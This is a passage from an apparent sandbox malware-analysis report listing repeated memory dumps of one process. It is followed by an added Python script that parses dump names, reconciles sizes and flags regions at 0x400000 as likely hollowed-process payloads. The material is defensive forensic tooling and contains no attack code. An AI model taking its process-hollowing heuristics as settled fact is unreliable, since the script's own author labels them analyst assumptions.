                                            • memory/5896-619-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-621-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-623-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-625-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-567-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-566-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB
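The dump names above encode the process ID, a snapshot sequence number and the virtual address range that was captured, so the listing can be reconciled and summarised mechanically instead of read entry by entry. The following script is an added example, not part of the sandbox report or of any sandbox tooling: it parses entries in this naming scheme, checks that the reported Filesize matches the address range (using the report's own binary KB/MB rounding), collapses repeated snapshots of one region, lists ranges that appear at the same address in several processes (which I treat, as a heuristic, as shared module mappings rather than per-process payloads), and flags regions based at 0x400000, the default 32-bit PE image base, as the first candidates to carve for a PE header given the SetThreadContext signature in this report. The sample input is a constructed subset of the entries above; the 0x400000 heuristic and the "shared module" interpretation are analyst assumptions, not statements the report makes.

```python
"""Parse sandbox memory-dump names of the form
memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp, reconcile Filesize, summarise per process."""
import re
from collections import defaultdict

# Constructed sample: a subset of the entries in the listing above,
# one per line as "<dump filename> <reported Filesize>".
SAMPLE_LISTING = """
memory/4448-1-0x0000000074EE0000-0x0000000075690000-memory.dmp 7.7MB
memory/4448-0-0x00000000006E0000-0x00000000006F6000-memory.dmp 88KB
memory/4456-87-0x0000000004910000-0x0000000004920000-memory.dmp 64KB
memory/4472-161-0x0000000005DD0000-0x0000000006124000-memory.dmp 3.3MB
memory/4472-149-0x0000000074EE0000-0x0000000075690000-memory.dmp 7.7MB
memory/4740-79-0x0000000005B70000-0x0000000005EC4000-memory.dmp 3.3MB
memory/5084-49-0x0000000074EE0000-0x0000000075690000-memory.dmp 7.7MB
memory/5636-426-0x0000000000400000-0x0000000000412000-memory.dmp 72KB
memory/5860-518-0x0000000000400000-0x0000000000412000-memory.dmp 72KB
memory/5896-566-0x00000000060D0000-0x0000000006168000-memory.dmp 608KB
memory/5896-567-0x00000000060D0000-0x0000000006168000-memory.dmp 608KB
"""

DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)

# Default image base of a 32-bit PE (assumption used only as a triage heuristic).
DEFAULT_IMAGE_BASE_32 = 0x400000


def human_size(n):
    """Format bytes the way the report does: whole binary KB below 1 MiB, one-decimal MiB above."""
    if n >= 1 << 20:
        return f"{n / (1 << 20):.1f}MB"
    return f"{n // 1024}KB"


def parse_entry(filename, reported):
    m = DUMP_RE.match(filename)
    if m is None:
        raise ValueError(f"not a memory dump filename: {filename!r}")
    start, end = int(m["start"], 16), int(m["end"], 16)
    if end <= start:
        raise ValueError(f"inverted address range in {filename!r}")
    return {"pid": int(m["pid"]), "idx": int(m["idx"]), "start": start, "end": end,
            "size": end - start, "reported": reported}


def parse_listing(text):
    entries = []
    for line in text.splitlines():
        if line.strip():
            filename, reported = line.split()
            entries.append(parse_entry(filename, reported))
    return entries


def check_sizes(entries):
    """Entries whose reported Filesize disagrees with end - start (empty means consistent)."""
    return [e for e in entries if human_size(e["size"]) != e["reported"]]


def unique_regions(entries):
    """Collapse repeated snapshots of one region: (pid, start, end) -> number of snapshots."""
    counts = defaultdict(int)
    for e in entries:
        counts[(e["pid"], e["start"], e["end"])] += 1
    return dict(counts)


def shared_regions(entries):
    """Address ranges dumped from more than one PID -> sorted PIDs. A range at the same
    address in many processes is usually a shared module mapping (heuristic)."""
    pids = defaultdict(set)
    for e in entries:
        pids[(e["start"], e["end"])].add(e["pid"])
    return {rng: sorted(p) for rng, p in pids.items() if len(p) > 1}


def candidate_payload_regions(entries):
    """Regions based at the 32-bit default image base: first places to carve for a PE
    header when the report shows SetThreadContext (process hollowing heuristic)."""
    return sorted({(e["pid"], e["start"], e["end"]) for e in entries
                   if e["start"] == DEFAULT_IMAGE_BASE_32})


if __name__ == "__main__":
    entries = parse_listing(SAMPLE_LISTING)
    print("size mismatches:", check_sizes(entries))
    for (pid, start, end), n in sorted(unique_regions(entries).items()):
        print(f"pid {pid}: 0x{start:08X}-0x{end:08X} {human_size(end - start)} x{n}")
    for (start, end), pids in shared_regions(entries).items():
        print(f"shared 0x{start:08X}-0x{end:08X} in pids {pids}")
    print("candidate payload regions:", candidate_payload_regions(entries))
```

Feed it the full listing (one "filename size" pair per line) and the per-PID summary shrinks the 31 snapshots of PID 5896 to a single 608KB region, isolates the 7.7MB range common to most processes, and leaves the two 72KB regions at 0x400000 in PIDs 5636 and 5860 as the dumps to open first.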